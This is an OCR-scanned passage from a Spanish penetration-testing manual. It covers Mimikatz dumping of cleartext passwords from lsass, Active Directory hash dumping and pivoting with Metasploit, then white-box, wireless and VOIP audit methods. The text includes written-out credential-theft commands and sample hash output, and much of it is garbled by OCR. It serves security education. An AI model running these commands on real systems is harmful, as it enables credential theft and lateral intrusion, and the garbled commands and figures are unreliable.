-  Inyeccion  de  librcrias. 

-  Manipulacion  de  privilegios. 

-  Volcado  en  texto  piano  de  las  contrasenas  de  los  usuarios  que  se  han  autenticado  en  el 
equipo. 


Esla  hen-amienta  es  muy  potente  y  util  en  una  auditoria.  Exisle  un  principio  de  localidad  temporal 
que  indica  que  en  los  servidores  se  autentican  muchos  usuarios,  e  incluso  los  administradores  se 
auleniican  en  ciertas  maquinas  dejando  cacheadas  las  credenciales.  Mirnikatz  se  aprovecha  de  esto  y 
puede  devolver  datos  de  mucho  interes  para  la  escalada  de  privilegios. 

Es  inieresante  estudiar  la  herramienta  a  fondo,  ya  que  dispone  de  muchas  funcionalidades,  pcro  dos 
cosas  pueden  ayudar,  y  mucho,  al  auditor  como  son  el  volcado  de  contrasenas  en  texto  piano  y  la 
exportacion  de  certificados  de  la  maquina. 

En  el  sigLiiente  ejemplo  se  supone  que  el  auditor  accede  a  una  maquina  de  la  organizacion  con 
penniso  y  quiere  obtener  credenciales  en  piano  para  poder  llegar  a  mas  sitios.  En  muchas  ocasiones 
se  han  encontrado  contrasenas  de  administradores  de  maquinas,  e  incluso  de  administradores  de 
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dominio.  Estos  hacen  un  mal  uso  de  dicha  credencial  que  tiene  gran  poder,  ya  que  con  ella  se  maneja 
la  infraestructura,  y  la  utilizan  para  acceder  a  ciertas  maquinas  para  resolver  problemas  de  otros 
usuarios.  Mientras  esas  maquinas  no  se  apaguen  la  credencial  queda  cacheada  por  el  proceso  Isass. 
exe.  Es  litil  buscar  en  servidores,  que  a  priori  no  son  iraportantes,  porque  se  dan  casos  en  los  que  se 
puede  encontrar  credenciales  muy  poderosas. 

Para  extraer  esta  infonnacion  de  los  equipos  se  utilizaran  los  siguientes  comandos. 

-  Privilege:  :debug 

-  Inject: :process  lsass.exe  sekL'T^Lsa.dll 

-  @getLogonPasswords 


minikatz  #  privilege :: debug  ^  ^  ti  •  -  nv 

Demande  d'ACTIUftTION  du  privilege  :  SeDebugPrivilege  -  OK 

mimikatz  tt  in ject : :process  lsass.exe  sekurlsa.dll 
PR0CESSENTRV32<lsass-exe>.th32ProcessID  =  664 
Attente  de  connexion  du  client- 
Serveur  connecte  a  un  client  ? 

Message  du  processus  : 

Bienvenue  dans  un  processus  distant 

Gentil  Kiwi 

SekurLSA  :  librairie  de  manipulation  des  donnees  de  securites  dans  LSASS 

mimikatz  It  egetLogonPasswords 

Autbentif ication  Id  = 

Package  d' autbentif ication  :  NTLn 

Utilisateur  principal  -  Admin is trador 

Domaine  i7l7bf5c0di77?2Lad3b435b51404ee  >,  ntln<  7ae21fl7cE 

aee7f b9ceba532d0546ad6  > 

wdigest  :  1234 

Autbentif ication  Id  = 

Package  d' autbentif ication  :  NTLM 
Utilisateur  principal  - 

Domaine  d"  autbentif  ication  = 

insul _ ^0  “  n.t.  (LUID  KO) 

v^digest  •  n.t.  ^LUID  KO) 

Autbentif  ication  Id  - 

Package  d' autbentif ication  =  NTLM 
Utilisateur  principal  = 

Domaine  d^autbent if ication^  b75?bf5c0d87772f aad3b435b51404ee  >,  ntlm<  7ce21fl7c{ 

aee7f b9ceba532d0546ad6  > 

wdigest  :  1234 

Autbentif  ication  Id  = 

Package  d' autbentif  ication  : 

Utilisateur  principal  -  SEfiUICIO  LOCAL 

Domaine  d' autbentif ication  :  HT  AUTHORITY 

ins:ul _ 0  -  n.t.  CLUID  KO) 

wdigest  -  n.t.  CLUID  KOy> 

Autbentif ication  Id  •  0;996^ 

Package  d^ autbentif ication  :  Negotiate 

1  T  Ratfiiir  nn-inal - : — Rftrm.C.in  flft  yfiu - - 

Fis.  3.59;  Exiraccion  de  contrasenas  en  piano  con  Mimikaiz. 


En  algunas  ocasiones  se  necesita  imocar  a  getlogonPasswords  con  sekwha::logonPass\vords. 


Capitulo  111.  Confeccionando  el  ataqiie 
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Existe  un  modulo  de  Meterpreier  que  carga  Mimikatz  en  este  payload  para  que  directamente  se 
pueda  extraer  este  tipo  de  infonnacion  o  certificados  desde  la  propia  sesion  de  Metasploit.  Para 
invocarlo  en  uiia  sesion  de  Meterpreier  simplemente  hay  que  ejecutar  la  instruccion  load  mimikatz. 

Como  se  ha  mencionado  anteriormente,  se  puede  encontrar  credenciales  muy  interesantes.  En  este 
punto  se  puede  haber  obtenido  el  administrador  de  dominio,  ya  sea  por  esta  tecnica,  por  alguna 
vLilnerabilidad  de  software  o  por  alguna  otra  ya  comentada. 

Hay  que  probar  a  entrar  en  el  DC,  ya  que  alii  se  podra  obtener  un  listado  de  todos  los  usuarios, 
maquinas  y  hashes  de  la  organizacion.  Aunque  ya  con  el  administrador  de  dominio  la  auditoria 
tiende  a  su  fin,  hay  que  presentar  evidencias  de  que  se  tiene  un  control  total,  y  una  de  ellas  podria  ser 
un  listado  de  usuarios  y  hashes  que  se  tienen  en  el  directorio  activo. 

Para  llevar  a  cabo  el  volcado  de  hashes  del  directorio  activo  se  utilizara  el  script  de  Meterpreier 
Smart Jiashdiimp.  Se  puede  utilizar  el  modulo  de  psexec  para  acceder  al  DC  con  la  credencial  de 
administrador  de  dominio,  y  luego  utilizar  la  siguiente  instruccion  para  lanzar  el  volcado  rim  post/ 
Miiulows/gather/smartjiashdiimp  GETSYSTEM^tnie.  Hay  que  destacar  que  si  el  equipo  es  un  DC 
reahnente,  se  obtendra  la  siguiente  frase  durante  el  proceso  de  volcado  "This  host  is  a  Domain 
Controller! 

pablo:19S6: 873 5172C3A77D2CeAAD3B435B 51404 EE :512B99O09997c3B5588C4FAC9C0AE969 
pef:ie:1987:873  5172C3A77D2C65AA.CD84CD4  94924F :  7015AA262  7690DA1100E50D3F2937f1S 
jose:1990:8735172c3A77D2C65AACD84CD494924F:7015AA2627690DA1100ES0D3F2937FlS 
gabriela:2001:7322F9013EF849BEAAD3B43  5B514  04EE:ED2CF29E92BF5F53F20B288CSC86'^S14 
1  an: 2004:791 5 564 QEEE2F6AAbEBlABCBFBl31lBB:164FDDFQ9AC4  516D83  50FCll93 54 2C89 _ 

Fig.  3.60;  Volcado  de  hashes  del  directorio  activo  para  informc. 


Por  ultimo  ahadir  que  desde  la  version  1 .3  de  WCE.,  se  dispone  de  una  opcion  para  extraer 
contrasenas  en  texto  piano  como  realiza  Mimikatz.  Para  ejecutar  esta  opcion  simplemente  hay  que 
subir  la  herramienta  WCE  a  la  maquina  remota,  para  posteriormente  desde  undi  shell  remoia  ejecutar 
la  aplicacion  con  el  parametro 


PoC:  Pivoting  +  PtH  =  Paseo  por  la  organizacion 

El  hecho  de  que  un  auditor  haya  accedido  a  un  nuevo  equipo  puede  haber  proporcionado  coneeti  vidad 
con  nuevas  maquinas  de  interes.  El  pivoting  permitira  al  auditor  ir  pasando  por  diversas  maquinas 
para  llegar  a  otras,  a  las  que  al  principio  directamente  no  podia  llegar. 

Es  cieito  que  juntando  la  tecnica  de  impersonalizacion  PtH  y  el  pivoting  entre  maquinas  el  auditor 
podra  acceder  a  cualquier  ubicacion.  Un  buen  pivote,  si  ya  se  ha  obtenido  el  administrador  de 
dominio  serian  los  DC,  ya  que  todos  los  equipos  del  dominio  tendran  conectividad  con  ellos. 

El  pivoting  se  llevara  a  cabo  con  Metasploit  y  se  podra  entender  que  es  reahnente  sencillo  el  Ilevarlo 
a  cabo.  Una  vez  sc  dispone  de  una  sesion  en  otro  equipo  remoto  a  traves  de  Metasploit..  ya  sea 
por  alguna  vulnerabilidad  encontrada  y  explotada,  o  por  haber  Ilevado  a  cabo  PtH,  se  dispone  del 
comando  route,  o  su  script  de  Meterpreier  equivalente  autoroute. 
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Se  propone  un  escenario  en  el  que  el  auditor  se  encuentra  dentro  del  DC  a  Mvds  de  una  sesion  de 
Melasploit,  y  se  quiere  llegar  a  la  red  de  produccion  que  se  encuentra  en  la  red  10.0.10  0/8.  Se  quie  e 
configurar  el  DC  como  pivote  para  llegar  a  ese  segmento  completamente  Para  ello  ejecuta  la 
siguiente  instruccion  dentro  de  la  sesion  de  Meterpreter,  run  autowute -s  10.0.10.0  n  25X0.U.L . 

leterpreter  >  run  autoroute  -s  1  O.e.l  0 .0  n  255.0.0.0 
[«]  Adding  a  route  to  1  O.e.l  0.0/255.0.0.0.  . . 

[+1  Added  route  to  lO.e.lO.O  /Z55.0.0.O  uia  lO.O.O.l 
[«1  Use  the  -p  option  to  list  all  actiue  routes 
neterpreter  >  _ _ _ 

Fig.  3.61 :  Configiiracion  6c pivoting  pai*a  llegar  a  otra  red. 


Se  ha  configLirado  para  que  se  enrute  a  traves  de  la  maquina  del  DC,  ^Como  sabe  Mefasploit  por  ciial 
sesion  debe  enrutar?  Gracias  al  atributo  sesaion.  Como  se  puede  visualizar  en  la  imagen,  Metasploit 
sabe  que  el  trafico  dirigido  hacia  la  red  10.0.10.0/8  debe  encaminarlo  hacia  el  Meterpreter  que  se 
encuentra  detras  de  la  ses.sion  con  id  1 . 

fueterpreter  >  background 

nsf  explo it (nsO8_067_netap 1 )  >  route  print 
fictiue  Routing  Table 


Subnet  Netnask  Gateuay 

.0.0.0  255.0.0.0  Session  1 

msf  exploitCmsOS  06?  netapi)  > _ 

Fig.  3.62:  Pivoling  pveparado. 


El  Pivotim  junto  al  PtH  puede  pennitir  acceder  a  cualquier  maquina  de  la  organizacion.  por  lo  que 
el  acceso  a  ias  maquinas  de  produccion  podria  tambien  verse  involucradas,  con  toda  la  iniormacion 
sensible  que  ello  puede  contencr. 


4.  Interna  con  privilegios 

Una  auditoria  de  caja  blanca  llevara  al  equipo  de  auditorla  a  realizar  una  serie  de  pruebas  para 
comprobar  que  la  configuracion  de  los  serx'icios  de  la  empresa  es  segura.  Ademas,  evti\uaaone 
sobre  codigo  tambien  deben  ser  realizadas  por  expertos  en  segundad  que  sepan  analizat  codiga 
Se  utilizaran  aplicaciones  que  permiten  verificar  y  chequear  que  los  V 

confiauraciones  con  un  grado  mhiimo  de  seguridad  y  saldran  a  la  luz  aplicaciones  esac 
y  configuraciones  no  optimas  en  terminos  de  fortificacion.  En  todo  mstante  el  auditor  dispone 
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de  privilegios  para  visualizar  y  chequear  configuraciones,  por  lo  que  no  se  debe  realizar  ningiina 
escalada  de  privilegio. 

Este  tipo  de  auditorla  encaja  bastante  en  un  modelo  procedimental,  aiinque  de  nuevo  siempre 
dependera  del  grado  de  destreza  del  auditor  con  las  herramientas  y  el  conocimiento  de  los  sistemas 
operativos  para  saber  donde  mirar  y  evaluar. 


Pruebas 

Las  pruebas  que  se  realizan  en  este  tipo  de  auditorlas  se  muestran  a  continuacion; 

-  Estado  de  los  sistemas.  Se  evakian  datos  generales  como  la  version  de  los  sistemas 
operativos,  paquetes  instalados,  aplicaciones  no  actiializadas,  etcetera.  Esta  infonuacion 
permite  obtener  un  mapa  de  infonuacion  sobre  el  estado  de  los  sistemas  ante  nuevas  amenazas 
que  van  surgiendo  en  forma  de  vulnerabilidades  en  el  software. 

-  Acceso  de  los  usuarios.  El  objetivo  de  esta  prueba  es  comprobar  las  rutas  y  archivos  a  los 
que  los  usuarios  pueden  acceder  sin  privilegio.  Se  evaliia  el  tema  de  pemiisos  y  como  estan 
configurados  estos. 

-  Analisis  de  comunicaciones.  Se  comprueba  si  las  comiinicaciones  establecidas  con  las 
distintas  maquinas  corresponden  al  rango  de  direcciones  intemo  de  la  organizacion.  Ademas, 
se  analiza  si  las  conexiones  se  realizan  de  manera  segura  cuando  el  trafico  que  circiila  por 
ellas  es  de  informacion  sensible. 

-  Configuracion  de  servicios.  Se  comprueba  que  los  servicios  de  la  empresa  se  encuentren 
correctamente  foitificados.  En  este  punto  siempre  se  puede  anadir  mejoras  a  la  fortificacion 
de  la  organizacion.  por  lo  que  es  importante  hacer  hincapie  en  ello.  Ademas.  este  punto  es  de 
los  mas  importantes  ya  que,  en  muchas  ocasiones.  los  fallos  de  seguridad  provienen  de  este 
punto. 

-  Evaluacion  de  pollticas  de  seguridad  orientadas  a  los  dispositivos  moviles  y  la  famosa 
ola  BYOD. 

-  Evaluacion  del  codigo  de  aplicaciones. 

PoC:  Evaluacion  de  configuraciones 

Es  dificil  contemplar  lodas  las  posibles  pruebas  y  pruebas  de  concepto  que  se  pueden  presentar  en 
una  auditorla  de  caja  blanca.  Siempre  dependera  del  ambito  en  el  que  el  auditor  se  encuentre  y  de 
la  infraestructura  y  servicios  montados  en  la  organizacion.  Por  esta  razon,  esta  prueba  de  concepto 
generaliza  una  posible  evaluacion  de  configuraciones,  mosirando  algiin  ejemplo  en  concreto. 

Este  tipo  de  prueba  se  puede  llevar  a  cabo  de  manera  automatica.  con  lo  que  el  auditor  ahorra  gran 
cantidad  de  tiempo.  aunque  tambien  debe  tener  en  cuenta  que  los  pequefios  detalles  se  caplaran 
^empre  mejor  de  manera  manual.  Lo  ideal  puede  ser  automatizar  el  proceso  con  escaneres  como 
■  eisw,  Nexpose  o  MBSA,  Microsoft  Ba.seline  Security  Analyzer^  esta  ultima  para  sistemas  Microsoft. 


MBSA  es  .sca„=r  ,»e  permi.e  iden.ificar  si«e„,as  «c™»/r  nnostondo  en  ded,ll=  la  siguieme 
informacion; 

-  Actualiaaciones  ao  apllcadas  y  fallos  an  la  configaracon  del «»//».««. 


Escaneos  sobre  distintas  versiones 


de  sistemas  Windows  y  aplicaciones. 

interfaz  grafica  o  en  modo  consola  con  la 


-  Escaneos  sobre  rangos  de  direcciones  via 

y  volcados  de  .nfomaacidn  en  XML  sohe  los  resullados  „b,enidos 

en  los  escaneos. 

Comprobacion  de  politicas  internas  en 
el  las  un  check  de  buenas  practicas 


fc'  eSne  Security  Analyzer 


la  configuracion  de  los  sistemas,  aplicando  sobre 


1  security  updates  are  missing 
Result  Details  for  Windows 
Securtty  Updates 

ns  marked  with  ^  are  confirmed  missing.  Items  marked  with 


.  3  service  packs  or  update  roflups  are  missing. 


☆  are  confirmed  miosirrg  and  are  not^oved  by  your^stem  administrate^ 


„  I  inriatp  for  Inrernet  Explorer  7  for  VVindpvvs  XP  0<B9ol2Baj 


MSOQ-QQZ  Cumulative  Security 


Update  Rollups  and  Service  Packs 

Items  mark^w;ith  are  confirmed  missing.  _  _  - -  -  — 

Score  ID  Description 

■.r.rinrfn.A.g  Malicious  Sofovarn  ffnmnyal  Tool  •  February  .-009  fKBSMgjai 

,  960715  I  Inrfaln  RoliiiP  for  ro-ih,-aX  Killbits  for  V'jindovvs  XP  (^9507151 


Download 


Fig.  3.63;  Ejccucion  de  MHSA  sobre  un  dominio  o  conjunio  de  maqumas. 

y  caja  negra.  son  herramientas  mas  potentes  que  ^  j^jexpose  se  puede  alcanzar  un 

estado  del  sistema  y  de  su  configuracion,  sm  ^  md^yox,  y  dimensionado  para  mas 

nivel  de  deteccion  de  tallos  de  configuracion  ^  ^  "^'i^^^^enciak;,  otorgandok  privilegios. 

Jon tfin  de  Sor“anar  ^n  nSs  piofundidad  el  estado  de  los  sistemas. 

En  sistemas  mX  el  auditor  se  encontrara  con  fela  c^orl^t^u-SSn  ^ep.able 
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liene  este  para  la  empresa.  Por  ejemplo,  un  servicio  de  SSH  el  cual  es  iitilizado  para  un  conjunto 
de  LiSLiarios  de  desaiTollo  no  liene  la  misma  importancia  que  un  servicio  SSH  que  se  utiliza  por 
contdbles  que  consultan  datos  bancarios  a  traves  de  este  servicio.  Por  esta  razon,  paranietros  dc 
configuracion  como  autenticacion  por  clave  publica,  y  niinca  pemiitida  por  usuario  y  contrasena, 
es  algo  vital.  Entrar  en  detalle  en  estas  configuraciones  podria  llevar  mas  de  un  capitulo  entero,  por 
ello  se  recomienda  estudiar  bien  el  sendcio  y  los  parametros  que  dispone  para,  junto  a  una  guia  de 
seguridad,  poder  optiniizar  el  nivel  de  fortaleza  del  servicio. 

Como  se  puede  entender  existe  un  niimero  infinito  de  servicios  que,  ademas,  cada  dia  son  mas  debido 
a  la  expansion  de  la  informatica,  las  redes  y  la  proliferacion  de  nuevas  tecnologias  y  aplicaciones.  Por 
esta  razon  el  auditor  no  podra  conocer  todas  las  configuraciones  deseadas  en  tenuinos  de  seguridad. 
A1  enfrentarse  a  un  nuevo  servicio  el  cual  se  desconocc,  o  bien  no  se  sabe  lo  suficiente,  se  debe 
estudiar  su  funcionamiento  y  la  dociimentacion  que  el  proveedor  aporta.  Seguramente  el  proveedor 
apoita  documentacion  con  tematica  de  seguridad  donde  se  encontraran  unas  buenas  practicas. 

Este  hecho  siimado  a  lo  que  el  auditor  ya  conoce  sobre  buenas  practicas  en  olros  entornos  puede 
hacer  llegar  a  una  configuracion  optima.  Por  otro  lado.  existe  el  conflicto  entre  productividad  y 
seguridad  en  la  empresa.  este  hecho  es  algo  con  lo  que  el  auditor  si empre  debera  lidiar. 

Como  ejemplo  sc  piopoue  que  el  auditor  observe  y  cheque  las  siguientes  caracterislicas  configuradas 
eii  un  servidor: 

-  .A.nalisis  de  la  version  del  sistema  operativo  y  actual izaci ones,  independientemenic  de  la 
platafonna  en  la  que  se  encuentre  el  servidor. 

-  Carga  del  servidor.  Este  detalle  puede  presentar  anomalias  en  los  rendimientos,  o  incluso 
en  el  software  que  no  deberia  estar  presente  en  la  maquina. 

-  Busqueda  de  archives  impoitantes.  Hay  que  tener  local izados  y  analizar  los  archives  dc 
icgistio,  como  los  evenlos  en  Windows  o  /var/log  en  Linux,  los  archives  de  confisuracion  de 
los  servicios  y  archives  especiales,  como  pueden  ser  los  rhosls  de  sistemas  Linux  sT estuvieran 
presentes. 

Analisis  de  procesos,  de  interfaces  de  red  y  de  comunicaciones. 

-  .Analisis  de  restricciones  de  acceso  al  sistema. 

Lxisten  olras  herramientas  de  aiiditoria  de  caja  blanca  como  son  Tiger  y  System  Scanner.  El  objetivo 
dc  eslas  herramientas  son  las  de  determinar  configuraciones  incorrectas  y  permisos  defectiiosos. 


5.  Wireless  &  VOIP 

l..saudiioriasir»i./my  VOIP  iwrmilaji  a  laorganizacion  conocer  al  estado  desnsconiunicaciones. 
<amo  inalambricas  como  de  voz  sobre  IP.  Este  tipo  de  auditon'as  son  en  un  alto  porcentaje 
Procediinentales,  sobre  todo  las  de  wirele.'is,  aunque  siempre  salen  nuevas  pruebas  a  realizar  y  que  el 
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auditor  debe  conocer  y  estar  actualizado.  Por  lo  general,  en  este  tipo  de  auditoria  o  fase  del  proceso 
se  realizan  distintas  pniebas  con  el  fin  de  determinar  el  nivel  de  confidencialidad  y  segundad  que 
proporcionan  este  tipo  de  infraestructuras. 

En  el  caso  de  las  auditorias  Mess  se  suelen  llevar  a  cabo  utilizando  herramientas  de  monitorizacion 
derLes  inalambrieas,  junto  a  d.stribueiones  GNUfLhna  orientadas  a  este  t.po  de  pruebas,  eomo 
pueden  ser  WifiSlcix,  BockTixick,  Kcih^  etcetera. 

En  el  caso  de  VOIP  el  auditor  se  conectara  a  una  red  de  VOIP  donde  se  realizaran  distintas  pruebas 
emul^tdo  el  ro,  de  disposUivo  de  voz.  El  objetivo  sera  verifiear  una  sene  de  pautas  con  las  que 
indicar  el  status  de  seguridad  de  dicha  intraestructuia. 


Pruebas  ,  ,  .  , 

Las  auditorias  wireless  proponer  una  serie  de  pniebas  que  pennitan  conocer  el  estado  de  la 
hLsmcma.  El  audit™  puede  utiliza,  la  metodologi,  OWISAM  dasarrollada  pot  la  amptesa 
Tarlogic,  con  la  que  se  pretende  orienlar  al  auditor  en  este  tipo  de  procesos. 


La  metodologia  OlVISAM  defme  un  total  de  64  controles  tecnicos,  los  cuales  estan  agrupados  en  10 
Xort  con  las  c|ue  se  especifican  nn  conjun.o  de  pruebas  uecesarias  par.  garanuzar  el  exuo  en 

esie  tipo  de  auditorias.  _ 


/■  QMByy- 1 


nwtSAM-Dl  Oescubrimlento  de  dlsposltlvos 

nwiSAM-FP  FingypHnting  . 

pWlSAM-CP  Cifrado  de  las  comunicaciones 

_ 

QWISAM-IF  Pruebas  de  Infraestructura  _  _ 

nMi^LfepS  P^mebas  de  ^ 

nwiSAM-GD  Pruebas  sobre  directives  y  normativa _ 

QWisAlk/l-CT  PrueibK.sobrfe  ios  dierit^^hal^ rri&Icc^. 
nwiSAM-H$  Pruebas  sobre  hostspots  y  portales^au^os 


,  :tlpo  de  control 


Pescripclon  de  los  controles 

jcopjigy>n  de  Inforjmaddn  sobre  las  redes  inalambricas  — f  J  ^  ■ 

Analisis  de  las  funclonalidades  de  bs  disposU^vos  de 
Anillslsde  loshi^nl^^^  n  i  i 

Analisis  de  los  mecanismos  ^cifrado  de 

Controles  de  seguridad  sobre  la  Infraestructura  WJreless  . .  Mutn 

Conti^bies  orientados  a  veriflca^  if  dl^orilbillda^  entorhb 

Analisis  de  aspectos  normativos  que  aplican  al  uso  de  las  redes  de^^ 

Toques  contra  cft^sIn^iSB 

Debilidades  que  afectan  al  uso  de  portales  cautivos. 


■  '.''A 


RiTi 


Fig.  3.64:  Top  dc  controles  OlVfSAM 2013. 


Como  se  pnede  visualize  en  la  imagen  existen  pruebas  espedficadas  direciamente  en  omSAU. 

aunque  algiinas  pueden  ser  anadidas  por  interes  de  la  oiganizacion. 

-  Descubriiniento  de  dispositivos.  En  este  tipo  de  prueba  se 

infonnacion  sobre  el  entorno  a  auditar  y  los  distintos  elemenlos  de  in  laes  lut 

encuentran  alrededor. 

-  Fingerprinting.  De  niievo  esta  tecnica  es  utilizada,  en  este  caso  para  realizar  un  analisis 
de  fiincionalidades. 

-  Pruebas  de  configuraciones  por  defectos  o  no  seguras. 


Capitiilo  HI.  Ccmfeccioncmdo  el  ataqiie 


Pmebas  sobre  la  autenticacion  y  el  cifrado  de  las  comunicaciones.  Se  evaluara  si  las 
comunicaciones  son  seguras  o  se  utiliza  algun  protocolo  no  seguro  en  la  organizacion.  La 
priniera  toma  de  contacto  con  las  redes  inalambricas  se  realiza  mediante  la  monitorizacion 
de  las  tramas  que  circulan  por  eJ  aire.  Este  analisis  peimitira  identificar  que  protocolos  se 
estan  utilizando. 

-  Pruebas  de  denegacion  de  servicio. 

Pruebas  de  redes  abiertas  y  portales  cautivos. 

-  Descubriiniento  de  SSIDS.  Otra  de  las  pruebas  permitira  conocer  los  SSJD  de  las  redes 
inalambricas  pertenecientes  a  la  organizacion.  Esta  infonnacion  puede  ser  util  para  los 
ataques  de  Rogue  AP. 

-  Ataques  de  Rogue  AP.  Esta  prueba  pennitira  identificar  algunas  vulnerabilidades  en  los 
sistemas  de  acceso  Wireless.  La  idea  es  suplantar  un  punto  de  acceso  (AP)  o  un  portal  cautivo 
para  que  los  usuarios  de  la  red  Wireless  confien  en  dicho  sistema  que  permitira  el  robo  de 
credenciales,  entre  otras  acciones. 

Junto  a  estas  pniebas  se  tiene  que  tener  muy  en  cuenta  los  principales  riesgos  de  seguridad  que 
inaica  la  metodologia  ()WISAA4 en  ias  redes  inalambricas.  se  enumeran  a  contiiniacion! 

-  Red  de  comunicaciones  wireless  abierta. 

-  Presencia  de  cifrado  WEP  en  redes  de  comunicaciones. 

-  Algoritmo  de  generacion  de  claves  del  dispositive  inseguro  (incluido  WPS). 

-  Clave  WEPfWPAIWPA2  basada  en  diccionario. 

-  Mecanismos  de  autenticacion  inseguros  (LEAP,  PEAP-MD5,  etcetera). 

-  Dispositive)  inalambrico  con  soporte  a  WPS. 

Red  inalambrica  no  autorizada  por  la  empresa. 

Portal  cautivo  inseguro. 

-  Cliente  accediendo  a  una  red  inalambrica  insegura. 

-  Cobeitura  de  la  red  muy  alta. 

La  auditoria  de  VOIP  en  una  organizacion  conlleva  una  serie  de  pruebas,  que  llevandolo  al  piano 
procedimental  se  puede  enumerar  en  un  orden  logico.  El  objetivo  de  las  pruebas  es  eval  uar  la  seguridad 
y  encontrar  vias  para  "romper"  la  seguridad  de  la  infraestructura  de  VOIP  de  la  organizacion. 

A  contiiniacion  se  propone  un  modelo  procedimental  con  cl  que  afrontar  una  auditoria  VOIP,  o 
llevar  a  cabo  un  plan  estrategico  de  cvaluacion: 

Identificacion  de  serxddores  y  terminales.  Es  importante  conocer  el  entorno  de  la  red  y 
como  esta  se  encuentra  constiiiiida. 

Deteccion  de  versiones  y  estudio  de  vulnerabilidades  potenciales  a  traves  de  busquedas 
de  exploits. 
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-  Verificacion  de  la  configuracion  general  de  los  terminales  de  empleados  de  la  organizacion. 

-  Deteccion  de  anomalias  en  los  comportamientos  de  la  red  de  voz  y  evaluacion  sobre 
ataques  basados  en  MITM.  El  objetivo  es  claro,  la  escucha  telefonica  de  una  comunicacion 
de  la  organizacion. 

-  Ejecucion  de  ataques  contra  los  servidores  en  busca  de  vulnerabilidades  o  desactualizacion 
de  productos. 

PoC:  Descubriendo  el  mundo  inalambrico  en  la  empresa 

En  esta  prueba  de  concepto  se  escenifica  como  empezar  la  auditoria  wireless  a  traves  del 
descubrimiento  de  lo  que  rodea  al  auditor  en  el  mundo  sin  cables. 

Es  importante  entender  bien  que  redes  son  de  la  empresa,  los  canales  que  se  utilizan  en  los  distmtos 
puntos  de  acceso,  recopilar  los  protocolos  de  seguridad,  la  existencia  de  redes  abiertas,  portales 
cautivos,  tipos  de  autenticacion,  etcetera.  Todo  este  primer  vistazo  se  llevara  a  cabo  en  la  pnmera 
fase  de  la  auditoria,  la  cual  se  puede  tomar  como  un  punto  de  partida  hacia  todas  las  pruebas  que  se 

realizaran  despues. 

Es  importante  darse  el  paseo  por  la  empresa  en  busca  de  todas  las  seiiales  wireless  de  la  organizacion, 
poder  realizar  un  mapa  con  los  puntos  de  acceso  recogidos  y  los  dates  que  se  van  encontrando  y  que 
pueden  aportar  al  auditor  mas  adelante.  Ademas,  tanto  la  identificacion  de  las  redes  de  la  empresa, 
como  la  multitud  de  puntos  de  acceso  distribuidos  es  una  de  las  pnmeras  tareas  que  daran  idea  de  la 
seguridad  a  la  que  se  enlrenta  el  auditor. 

Hay  que  evaluar  liasta  donde  llega  la  intensidad  de  la  senal,  ya  que  en  algunas  ocasiones  se  puede 
disponcr  de  senal  desde  fuera  de  las  in.stalaciones  de  la  organizacion.  Ademas.  habra  que  evaluar  e 
cifrado  que  dispone  la  red.  ya  que  si  la  red  tiene  un  cilrado  debil,  o  incluso  esta  abierta  porque  es 
una  red  dc  invitados,  el  trafico  puede  ser  capturado  desde  ftiera  de  la  organizacion.  Es  cicrto  que  se 
tienen  que  dar  ambas  condiciones,  pero  existen  casos  reales. 

En  aliiunas  ocasiones  pueden  aparccer  redes  extraiias  a  la  compafiia.  de  las  que  habra  que  tomar  nota 
por  varias  razones.  Pueden  ser  redes  que  algun  departamento.  o  algun  empleado  hayan  montado  de 
manera  no  autorizada  por  la  gente  de  sistemas,  poniendo  en  peligro  la  seguridad  de  la  led.  Poi  o  la 
parte,  podrian  ser  redes  pertenecientes  a  otras  empresas  cercanas  en  el  espacio.  De  todos  modos 
habra  que  notificar  en  el  informe  la  existencia  de  este  tipo  de  redes. 

La  identificacion  de  SSID  permitira  visualizar  si  alguna  de  las  redes,  tanto  de  la  organizacion  como 
si  no,  fiieran  de  almin  proveedor  por  defecto.  Logicamente,  una  red  de  empresa  no  dispondra  de  una 
configuracion  por  defecto.  pero  si  pueden  provocar  cierto  "pique  "  con  los  nombres  por  defecto.  S 
como  sea,  se  debe  anotar  toda  esta  informacion  de  cara  al  intorme  y  la  posteiior  evaluacion 
seguridad  wireless. 

Todo  este  trabajo  se  puede  llevar  a  cabo  con  diversas  hen-amientas,  peio  una  que  siempie  debtf 
estar  con  el  auditor  es  airoclump-ng,  de  la  suite  aircrack-ng.  Esta  herramienta  permite  a  usu 
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escuchar  o  capturar  todo  el  trafico  que  circula  por  el  aire.  Es  impoitante  entender  que  es  el  modo 
monitor  y  que  permite  realizar  al  auditor. 
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Fig.  3.65:  CapUira  de  trafico  con  airoebnup-ng. 


En  muchas  ocasiones  el  auditor  prefiere  utilizar  heri'amienlas  visuales  que  identifiquen  todo  lo  que 
ocurre  de  manera  sencilla,  pero  la  mayona  dc  dichas  herramientas  utilizan  por  debajo  airodump-ng. 
con  sii  modo  monitor. 

A  contmuacion  se  detallan  los  parametros  que  pueden  ser  visualizados  en  el  descubrimiento  de 
elementos  en  el  entorno  wireless  en  una  auditoria. 


Parametro 

Descripcion 

Bssid 

Identifica  la  direccion  MAC  de  un  punto  de  acceso 

PWR 

Intensidad  de  la  senal.  El  significado  depende  del  controlador,  en  algunos 

modelos  cuanto  mas  cerca  del  0  mayor  nivel  y  en  otros  cuanto  mas  cerca  del 
100  mejor  nivel  de  serial 

Beacons 

Numero  de  balizas  o  paquetes  anuncio  eiwiados  por  el  AP 

Data 

Numero  de  paquetes  de  dates.  En  WEP  solo  cuenlan  los  IVS 

n/s 

Numero  de  paquetes  de  datos  por  segundo 

CH 

Canal 

MB 

Velocidad  minima  soportada  por  el  AP 

Ei\C 

Algontmo  de  cifrado  en  uso  por  el  AP.  Puede  ser  OPN.  WEP.  WPA  o  WP4  7 

CIPHER 

Tipo  de  cifrado  de  datos.  Puede  ser  WEP.  TKIP  ( WPA)  o  CCMP  i  WPA2) 
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Parametro 

Descripcion 

AUTH 

Metodo  de  autenticacion.  Generalmente  suele  visualizarse  PSK  en  entornos  de 

clave  compartida 

ESSID 

Nombre  de  la  red  wireless 

Station 

Direccion  MAC  de  un  cliente  asociado  a  un  AP 

Probe 

Son  paquetes  en  los  que  un  cliente  intenta  identificar  una  red  wireless.  Se  puede 

obtener  el  nombre  de  redes  que  un  cliente  esta  buscando  e  intenta  veiificai  que 

se  encuentran  en  su  radio  de  accion 

Tabla  3.03:  Paramelros  de  airodump-ng, 

Mediante  la  monitorizacion  con  la  herramienta  airodiimp-ng  u  otras  heiTamientas  de  escaneo,  se 
puede  visualizar  en  iin  entomo  empresarial  un  gran  numero  de  SSID,  I  os  cuales  pertenecen  a  las  redes 
de  la  empresa.  Esto  es  altamente  probable,  ya  que  si  la  organizacion  es  grande,  habia  repaitidos  por 
